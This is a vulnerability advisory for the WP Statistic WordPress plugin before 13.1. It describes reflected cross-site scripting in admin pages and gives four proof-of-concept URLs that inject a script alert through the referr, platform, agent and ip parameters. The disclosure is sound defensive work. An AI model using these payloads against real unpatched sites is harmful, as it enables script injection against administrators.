WP Statistic < 13.1 – Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape various user input before outputting it back in pages, which could lead to Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=wps_referrers_page&referr="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_visitors_page&platform="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_visitors_page&agent="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_visitors_page&ip="><script>alert(/XSS/)</script>

Affects Plugins

Fixed in 13.1

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Vlad Visse

Verified

Yes

WPVDB ID

e868b6f3-22ce-42c5-bb29-d8005c6cb6fd

Timeline

Publicly Published

2021-08-30 (about 4 years ago)

Added

2021-08-30 (about 4 years ago)

Last Updated

2021-08-30 (about 4 years ago)

Other

Published

Title

Published

2024-02-26

Title

PayU India <= 3.8.8 - Reflected XSS via type

Published

2024-05-30

Title

Premium Addons for Elementor < 4.10.32 - Contributor+ DOM-Based Stored Cross-Site Scripting via Global Tooltip

Published

2024-03-23

Title

Shortcodes Ultimate < 7.0.5 - Contributor+ Stored Cross-Site Scripting via 'note_color' Shortcode

Published

2023-05-11

Title

Pinterest RSS Widget <= 2.3.1 - Contributor+ Stored Cross-Site Scripting via shortcode

Published

2021-09-09

Title

Wise Agent Capture Forms < 3.0 - Reflected Cross-Site Scripting